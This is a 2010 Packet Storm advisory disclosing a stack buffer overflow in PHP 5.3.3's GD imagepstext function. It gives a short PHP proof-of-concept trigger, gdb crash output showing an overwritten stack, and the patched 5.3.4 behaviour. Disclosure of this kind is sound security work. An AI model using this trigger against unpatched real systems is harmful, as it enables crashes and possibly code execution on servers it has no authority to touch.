PHP 5.3.3 GD Stack Buffer Overflow

2010-12-10T00:00:00
ID PACKETSTORM:96621
Type packetstorm
Reporter Martin Barbella
Modified 2010-12-10T00:00:00

Description

                                        
                                            `Description:  
  
Prior to version 5.3.4, PHP's GD extension did not properly validate  
the number of anti-aliasing steps passed to the function imagepstext.  
The value of this parameter is expected to be either 4 or 16. To  
accommodate this, an array of 16 integers, aa, is located on the  
stack. Before the number of steps is validated, it is used to populate  
the array. This results in a stack-based buffer overflow.  
  
Proof of concept:  
  
<?php  
$img = imagecreatetruecolor(1, 1); //Arbitrary  
$fnt = imagepsloadfont("somefont.pfb"); //Arbitrary  
//The final parameter is the number of anti-aliasing steps  
imagepstext($img, "Testing", $fnt, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA,  
0xAAAAAA, 0xAAAAAA, 0, 0, 0.0, 99999);  
?>  
  
Result in php 5.3.3 (with gdb):  
  
sh-4.1$ php -v  
PHP 5.3.3 (cli) (built: Jul 22 2010 15:37:02)  
Copyright (c) 1997-2010 The PHP Group  
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies  
sh-4.1$ gdb php  
<trimmed>  
(gdb) run imagepstext_poc.php  
Starting program: /usr/bin/php imagepstext_poc.php  
[Thread debugging using libthread_db enabled]  
  
Program received signal SIGSEGV, Segmentation fault.  
0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,  
return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)  
at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257  
4257 aa[i] = gdImageColorResolveAlpha(bg_img, rd, gr, bl, al);  
Missing separate debuginfos, use: <trimmed>  
(gdb) bt  
#0 0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,  
return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)  
at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257  
#1 0x00aaaaaa in ?? ()  
#2 0x00aaaaaa in ?? ()  
#3 0x00aaaaaa in ?? ()  
#4 0x00aaaaaa in ?? ()  
#5 0x00aaaaaa in ?? ()  
<etc>  
  
Result in php 5.3.4:  
  
$ ./php-5.3.4 -v  
PHP 5.3.4 (cli) (built: Dec 10 2010 10:26:40)  
Copyright (c) 1997-2010 The PHP Group  
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies  
$ ./php-5.3.4 imagepstext_poc.php  
  
Warning: imagepstext(): AA steps must be 4 or 16 in  
/home/.../imagepstext_poc.php on line 4  
  
`